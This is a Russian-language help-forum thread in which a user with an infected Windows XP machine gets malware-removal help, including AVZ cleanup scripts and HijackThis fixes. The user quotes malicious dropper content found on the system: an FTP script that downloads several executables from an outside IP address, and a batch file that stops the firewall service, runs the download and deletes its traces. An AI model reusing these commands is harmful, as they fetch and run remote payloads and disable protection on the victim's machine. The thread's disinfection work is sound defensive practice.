-
Junior Member
- Вес репутации
- 53
Вирусы, Появляются новые пользователи
Здравствуйте!
В последнее время часто хватаем вирусы (несмотря на устанавливаемые обновления лицензионной WinXP и антивирус Avira), периодически на странице входа появляются непонятные новые пользователи.
Помогите пожалуйста может в системе где то все таки сидит какая то зараза, а то очень не хочется переустанавливать Виндоус и менять IP адрес у провайдера.
На время выполнения скрипов сейчас интернета нет.
В папке с виндоусом файлы странного содержания:
open 122.224.54.14
1433
donw
binary
get 1.exe
get 2.exe
get 3.exe
get 4.exe
или
C:\WINDOWS\system32\sc.exe stop sharedaccess
C:\WINDOWS\system32\ftp.exe -s:cc1.txt
2.exe
2.exe
del cc1.txt
del %%0
-
Будь в курсе!
Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
-
В AVZ - файл - выполнить скрипт
Код:
begin
SearchRootkit(true, true);
SetAVZGuardStatus(True);
QuarantineFile('sethc.exe','');
QuarantineFile('C:\WINDOWS\System32\h.exe','');
QuarantineFile('C:\WINDOWS\System32\g.exe','');
QuarantineFile('C:\WINDOWS\System32\f.exe','');
DeleteFile('C:\WINDOWS\System32\f.exe');
DeleteFile('C:\WINDOWS\System32\g.exe');
DeleteFile('C:\WINDOWS\System32\h.exe');
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
RebootWindows(true);
end.
Кмопьютер перезагрузится.
ПРишлите каранитн, как написано в правилах
Выполните эту процедуру http://virusinfo.info/showthread.php...newpost&t=3519
-
-
Junior Member
- Вес репутации
- 53
Карантин загрузил.
Загрузил результат скрипта сбора неопознанных и подозрительных файлов
Файл сохранён как 110129_213947_virusinfo_files_IRA_4d445ef3a4213.zi p
Размер файла 7229464
MD5 900efc9bd9a44d61cf41ce6a8a0e3e83
-
-
-
Junior Member
- Вес репутации
- 53
Да и при включении выскакивает быстро сообщение на черном фоне о том, что служба брандмауэр/общий доступ к интернету отключается
При попытке в панели управления включить брандмауэр - включает, но после перезагрузки опять это сообщение и он опять выключается
-
Сами прописывали? Если нет, профиксите в HijackThis
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Int ernet Settings,ProxyServer = http=127.0.0.1:2080
- Выполните скрипт в AVZ
Код:
begin
SearchRootkit(true, true);
SetAVZGuardStatus(True);
DeleteFile('%windir%\Tasks\52390.job');
DeleteFile('%windir%\Tasks\52391.job');
DeleteFile('%windir%\Tasks\52392.job');
QuarantineFile('C:\WINDOWS\system32\cgxxj.biz','');
DeleteFile('C:\WINDOWS\system32\cgxxj.biz');
RegKeyParamDel('HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Services\HidServ\Parameters','ServiceDll');
DeleteFile('C:\WINDOWS\System32\f.exe');
DeleteFile('C:\WINDOWS\System32\g.exe');
DeleteFile('C:\WINDOWS\System32\h.exe');
BC_ImportAll;
ExecuteSysClean;
ExecuteRepair(9);
ExecuteWizard('TSW', 2, 2, true);
ExecuteWizard('SCU', 2, 2, true);
RegKeyIntParamWrite('HKLM','SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer','NoDriveTypeAutoRun',221);
BC_Activate;
RebootWindows(true);
end.
После перезагрузки:
- выполните такой скрипт
Код:
begin
CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.
- Файл quarantine.zip из папки AVZ загрузите по ссылке Прислать запрошенный карантин вверху темы
- Сделайте повторные логи по правилам п.2 и 3 раздела Диагностика.(virusinfo_syscheck.zip;hijackthis.log)
-
-
Junior Member
- Вес репутации
- 53
Пофиксил, выполнил, загрузил.
-
Junior Member
- Вес репутации
- 53
Извиняюсь, забыл файлы вложить.
Как вы считаете если кто-то проникал на компьютер - нужно поменять IP адрес у провайдера (он статический)? И после лечения он не сможет поникнуть?
-
Чисто
Сообщение от
vityang
Как вы считаете если кто-то проникал на компьютер - нужно поменять IP адрес у провайдера (он статический)?
Смените все пароли. Фаервол настройте... Менять не обязательно.
-
-
Junior Member
- Вес репутации
- 53
Спасибо ! ! !
Попробуем работать дальше.
Но видно чтo то в Windows все же повреждено - После того как устанавливаешь файервол Comodo - при соединении клиент-банка - выкидывает в синий экран с сообщением об ошибке ndis.sys. После удаления Comodo работает вроде нормально. (Хотя может это проблема Comodo). Переустанавливать из за клиент банка сильно проблемно.
-
Итог лечения
Статистика проведенного лечения:
- Получено карантинов: 2
- Обработано файлов: 11
- В ходе лечения вредоносные программы в карантинах не обнаружены
-